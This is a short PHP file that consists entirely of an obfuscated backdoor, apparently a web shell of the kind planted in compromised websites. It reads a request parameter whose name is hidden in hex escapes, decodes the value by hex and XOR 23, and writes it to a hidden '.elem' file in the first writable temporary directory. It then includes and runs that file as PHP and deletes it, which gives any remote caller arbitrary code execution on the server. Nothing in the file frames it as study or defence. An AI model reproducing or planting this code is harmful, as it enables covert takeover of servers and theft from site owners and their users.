<?php

if(in_array("\x70g\x72p", array_keys($_REQUEST))){
	$item = hex2bin($_REQUEST["\x70g\x72p"]);
	$descriptor= '';$e = 0; while($e < strlen($item)){$descriptor .= chr(ord($item[$e]) ^ 23);$e++;}
	$holder = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/tmp", sys_get_temp_dir(), "/var/tmp", "/dev/shm", session_save_path()]);
	$res = 0;
do {
    $data = $holder[$res] ?? null;
    if ($res >= count($holder)) break;
    		if (is_writable($data) && is_dir($data)) {
    $entity = "$data" . "/.elem";
    $success = file_put_contents($entity, $descriptor);
if ($success) {
	include $entity;
	@unlink($entity);
	exit;}
}
    $res++;
} while (true);
}